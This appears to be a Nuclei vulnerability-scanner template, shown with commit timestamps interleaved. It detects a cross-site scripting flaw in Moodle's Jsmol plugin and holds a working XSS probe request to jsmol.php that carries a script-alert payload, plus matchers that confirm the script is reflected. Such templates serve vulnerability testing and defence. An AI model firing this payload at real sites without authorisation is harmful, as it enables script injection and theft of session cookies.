2020-04-08 16:52:17 +00:00
id : moodle-filter-jmol-xss
2020-04-08 12:48:06 +00:00
info :
2022-09-21 21:42:27 +00:00
name : Moodle Jsmol - Cross-Site Scripting
2020-04-08 12:48:06 +00:00
author : madrobot
2020-05-24 22:19:21 +00:00
severity : medium
2022-09-21 21:42:27 +00:00
description : Moodle contains a cross-site scripting vulnerability via the Jsmol plugin and may also be susceptible to local file inclusion or server-side-request forgery. An attacker can execute arbitrary script in the browser of an unsuspecting user and steal cookie-based authentication credentials and launch other attacks.
2022-04-22 10:38:41 +00:00
reference :
- https://www.dionach.com/blog/moodle-jmol-plugin-multiple-vulnerabilities/
2022-09-21 21:42:27 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score : 7.2
cwe-id : CWE-79
2021-02-12 05:53:01 +00:00
tags : moodle,xss
2020-04-08 12:48:06 +00:00
requests :
- method : GET
path :
2021-07-14 10:37:09 +00:00
- "{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html"
2020-07-08 11:38:57 +00:00
matchers-condition : and
2020-04-08 12:48:06 +00:00
matchers :
- type : status
status :
2020-05-24 22:19:21 +00:00
- 200
2021-07-14 10:37:09 +00:00
2020-04-08 13:27:52 +00:00
- type : word
words :
2021-07-14 10:37:09 +00:00
- "<script>alert('XSS')</script>"
2020-04-08 12:48:06 +00:00
part : body
2021-07-14 10:37:09 +00:00
- type : word
part : header
words :
2022-05-13 20:26:43 +00:00
- "text/html"
2022-09-21 21:42:27 +00:00
# Enhanced by md on 2022/09/19